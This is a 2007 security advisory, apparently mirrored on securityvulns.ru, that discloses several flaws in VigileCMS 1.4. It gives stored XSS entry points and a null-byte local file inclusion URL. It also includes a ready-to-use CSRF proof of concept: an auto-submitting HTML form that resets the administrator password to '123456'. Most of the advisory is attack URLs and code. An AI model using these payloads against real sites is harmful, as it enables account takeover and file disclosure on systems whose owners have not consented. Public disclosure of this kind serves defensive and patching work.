Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  IceBB 1.0rc6 <= Remote SQL Injection

  IceBB 1.0rc6 <= Remote SQL Injection

  FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection

  MoBiC-18: PHP-Fusion CAPTCHA bypass

From:info_(at)_opencosmo.com <info_(at)_opencosmo.com>
Date:19.11.2007
Subject:VigileCMS 1.4 Multiple Remote Vulnerabilities

VigileCMS 1.4 Multiple Remote Vulnerabilities
---------------------------------------------------------------------------------
------
---------------------------------------------------------------------------------
------
  Author : DevilAuron (http://devilsnight.altervista.org)

  Vendor : VigileCMS 1.4
  Date   : [16-11-2007] (dd-mm-yyyy)


Permanent Xss:
---------------------------------------------------------------------------------
------
http://[site]/[path]/index.php?module=vedipm&inviapm=true
http://[site]/[path]/index.php?module=live_chat
Insert on the message the xss


Local File Inclusion:
---------------------------------------------------------------------------------
------
http://[site]/[path]/index.php?module=[somefile]%00


CSRF:
---------------------------------------------------------------------------------
------
<form name="cambia" method="post" action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass">
<input type="password" name="new1" maxlength=20 value="123456">
<input type="password" name="new2" maxlength=20 value="123456">
<input type="hidden" name="pw" value="Cambia la Password">
</form>
<script>document.cambia.submit()</script>
<!-- This change the Admin password -->

---------------------------------------------------------------------------------
------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru